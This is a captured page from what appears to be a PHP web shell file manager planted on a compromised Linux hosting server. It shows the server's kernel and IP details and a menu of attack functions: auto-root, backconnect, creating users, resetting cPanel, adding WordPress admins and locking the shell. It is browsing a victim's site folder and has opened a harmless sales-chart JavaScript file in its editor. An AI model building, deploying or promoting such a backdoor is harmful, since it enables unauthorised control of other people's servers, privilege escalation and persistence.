Linux server-604606.appsiete.com 3.10.0-1160.139.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Nov 3 13:30:41 UTC 2025 x86_64
Apache
: 162.240.172.200 | : 216.73.216.32
14 Domain
7.3.33
gujo45me
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
gujo45me /
public_html /
limalab /
public /
js /
home /
[ HOME SHELL ]
Name
Size
Permission
Action
estadisticas.js
1.67
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : estadisticas.js
$(function () { $._requestApi('/home/getVentas', {}, 'GET', function (resolve) { if (resolve) cargarVentas(resolve) }); }); function cargarVentas(ventas) { var ctx = document.getElementById("ventas").getContext('2d'); var myChart = new Chart(ctx, { type: 'line', data: { labels: ["Enero", "Febrero", "Marzo", "Abril", "Mayo", "Junio", "Julio", "Agosto", "Setiembre", "Octubre", "Noviembre", "Diciembre"], datasets: [{ label: 'Ventas del '+ (new Date()).getFullYear(), data: [ventas.enero, ventas.febrero, ventas.marzo, ventas.abril, ventas.mayo, ventas.junio, ventas.julio, ventas.agosto ,ventas.setiembre ,ventas.octubre ,ventas.noviembre ,ventas.diciembre], backgroundColor: [ 'rgba(75, 192, 42, 0.2)', ], borderColor: [ 'rgba(75, 192, 42, 1)', ], borderWidth: 2 }] }, options: { maintainAspectRatio: false, scales: { yAxes: [{ ticks: { beginAtZero:true, callback: function(value) {if (value % 1 === 0) {return value;}} } }] }, tooltips: { enabled: true, mode: 'single', callbacks: { label: function(tooltipItems, data) { return tooltipItems.yLabel + " ventas"; } } }, } }); }
Close